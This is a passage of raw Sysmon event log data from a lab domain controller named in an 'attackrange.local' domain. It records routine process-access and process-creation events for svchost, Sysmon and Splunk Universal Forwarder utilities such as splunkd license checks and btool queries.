Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.233{08A6967A-4327-6000-CC00-000000009A01}34084640C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.999{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4327-6000-CC00-000000009A01}3408C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.999{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.999{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.999{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.999{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.999{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.999{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.999{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.999{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.999{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.999{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4327-6000-CC00-000000009A01}3408C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.999{08A6967A-4326-6000-CA00-000000009A01}30843076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-4327-6000-CC00-000000009A01}3408C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.003{08A6967A-4327-6000-CC00-000000009A01}3408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4326-6000-CA00-000000009A01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000004016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.862{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4328-6000-D900-000000009A01}2032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.862{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.862{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.862{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.862{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.862{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.862{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.862{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.862{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4328-6000-D900-000000009A01}2032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.862{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.862{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.862{08A6967A-4328-6000-D800-000000009A01}49404952C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4328-6000-D900-000000009A01}2032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.865{08A6967A-4328-6000-D900-000000009A01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT 